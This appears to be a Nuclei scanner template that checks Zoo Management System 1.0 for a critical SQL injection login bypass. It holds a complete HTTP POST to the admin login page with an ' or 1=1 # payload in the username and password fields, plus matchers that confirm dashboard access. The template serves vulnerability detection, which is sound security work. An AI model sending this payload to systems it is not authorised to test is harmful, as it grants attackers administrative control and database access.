id: zms-auth-bypass info: name: Zoo Management System 1.0 - SQL Injection author: dwisiswant0 severity: critical description: Zoo Management System 1.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/48880 - https://packetstormsecurity.com/files/159567/Zoo-Management-System-1.0-SQL-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: max-request: 1 tags: edb,auth-bypass,packetstorm,zms http: - raw: - | POST /zms/admin/index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} Referer: {{BaseURL}}/zms/admin/index.php Cookie: PHPSESSID={{randstr}} username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= host-redirects: true max-redirects: 1 matchers-condition: and matchers: - type: regex regex: - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" - "ZMS ADMIN" condition: and part: body - type: status status: - 200 # digest: 4a0a004730450221008e24a1fd5ca7c979273809eef2064368ced048827a2eb32f3a5340632311e9c002207c1fa7243fa42bec9cb3d14f2126ed768a70c55af34a5fd728cf25bb61524af5:922c64590222798bb761d5b6d8e72950